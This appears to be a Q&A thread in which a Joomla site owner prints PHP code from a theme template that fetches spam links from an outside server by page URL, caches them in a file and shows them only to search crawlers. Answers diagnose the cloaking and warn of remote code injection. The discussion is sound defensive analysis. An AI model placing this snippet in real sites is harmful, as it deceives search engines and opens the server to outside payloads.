# Can someone explain to me what this php code is doing?

Tags: php, joomla

I am using a Joomla template called Liberty and I started getting these odd links show up on pages. If I cleared my website cache the links disappeared only to show up later. I finally tracked down the problem. The index.php code called an include page called template.php which in turned called a file called mods.php. Below is the code from those files.

From template.php:

```
<?php
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me3.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) {    
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}
?>
```

This is code from mods.php from my server which has the weird links I was getting:

```
<p><a target="_blank" href="https://ro-ro.facebook.com/zebras.ro">zebras magazin haine femei</a> <a target="_blank" href="http://mkhandtaschen.tumblr.com/">michael kors tasche schwarz</a></p>
```

I downloaded a fresh copy of the template from the template developer and the mods.php file is different on it:

```
<div class="leader"><p><a target="_blank" title="t shirt bedrucken" href="http://webhostshield.com/bluehost-review/">bluehost 2013 reviews</a></p></div>
```

I can sort of follow most of what is going on but I don't get the external link to psdu.net/me3.php. I've disabled the line in my index.php file that calls template.php and the site works fine. These two files just look really fishy and unnecessary to me. I'd appreciate any input from a more experience php coder than myself. Thanks!

Comment: It seemingly retrieves, caches and prints out spam for Googlebot&Co.

Comment: That is really not good. If the original template does not have these files you should replace the whole original template,  I would be concerned that your site has been hacked if the files do not match what you had originally installed. You need to figure out why that has happened. Check all your extensions and make sure they are not on the vulnerable extensions list.

Comment: This came in the template. Only the mods.php is different because the template.php code writes the links to mods.php. I had contacted the developer of the template a couple weeks ago before I figure out what was going on and never heard back. Yesterday after I knew what the problem was I went back to his site and downloaded some of his other templates to see what they had. They too were like this one with the same template.php and mods.php files. So I don't know if it was a deliberate move on his part or if his site was compromised. I cleaned these from my site for now.

Comment: I am wondering what to do about this template website.

Answer (score 0):

It checks the HTTP_USER_AGENT which usually contains information about Browser, OS, versions and so on.  It then echos out the credits (what is shown by mods.php) if the HTTP_USER_AGENT contains 'Googlebot','Yahoo','msnbot' or 'Googlebot-Mobile'

I assume that this is providing additional information from mods.php for any search engines indexing your page.

Comment: If I'm figuring it out right, it's taking $path which apparently is the url of my site's page and using it to seed the link to psdu.net/me3.php?i=. I played around with it in a web browser and plugged in different urls of popular sites on the net and got variations to the links I was getting.

Comment: You are right, I overlooked that it is saving the $credits with the content of the page 'http://psdu.net/me3.php?i='.$path where $path in the above code is going to be your your sites page.

Answer (score 0):

This is really not good and can be considered a severe vulnerability.

If anyone can impersonate psdu.net (e.g. DNS spoofing; note that no SSL - and thus no remote party authentication - is involved) - or psdu.net comes into the wrong hands - any PHP payload can be stored in the mods.php file and "triggered" by accessing the .../templates//html/mods.php URL.

Actually, this is REALLY BAD!